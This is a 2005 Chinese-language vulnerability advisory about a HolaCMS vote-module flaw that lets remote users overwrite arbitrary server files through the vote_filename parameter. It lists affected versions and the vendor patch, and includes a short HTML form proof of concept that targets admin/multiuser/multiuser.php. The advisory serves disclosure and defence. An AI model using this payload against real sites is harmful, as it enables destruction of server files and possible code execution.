首页 -> 安全研究

安全研究

安全漏洞
HolaCMS投票模块远程文件破坏漏洞

发布日期:2005-03-14
更新日期:2005-03-14

受影响系统:
Hola HolaCMS 1.4.9
Hola HolaCMS 1.4.8
Hola HolaCMS 1.4.7
Hola HolaCMS 1.4.6
Hola HolaCMS 1.4.5
Hola HolaCMS 1.4.4
Hola HolaCMS 1.4.3
Hola HolaCMS 1.4.2a
Hola HolaCMS 1.4.2
Hola HolaCMS 1.4.1
Hola HolaCMS 1.4
Hola HolaCMS 1.2.9
Hola HolaCMS 1.2.10
不受影响系统:
Hola HolaCMS 1.4.9-1
描述:
BUGTRAQ  ID: 12789

HOLACMS是一款基于WEB的内容管理系统。

由于一个输入验证错误,用户可以向攻击者指定的文件提交投票数据。

漏洞的起因是投票模块没有检查所提交的vote_filename变量是否位于holaDB/votes/目录中。这个漏洞可能允许远程用户破坏服务器上的文件。攻击者可以利用这个漏洞破坏HolaCMS, 还可以破坏Web Server进程环境中的任意系统文件。尽管未经确认,但应该可以通过在电脑中的破坏脚本来执行任意代码。

<*来源:Virginity Security (advisory@konfiweb.de
  
  链接:http://www.securityfocus.com/archive/1/393040
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

可以使用以下例子向站点提交自定义的HTTP POST:

<form action="http://www.example.com/[site-with-vote].php?vote=1"
method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/
multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

建议:
厂商补丁:

Hola
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载HolaCMS 1.4.9-1:

http://www[dot]holacms[dot]de/download/140/holaCMS-1.4.9-1.tar.gz

浏览次数:2533
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障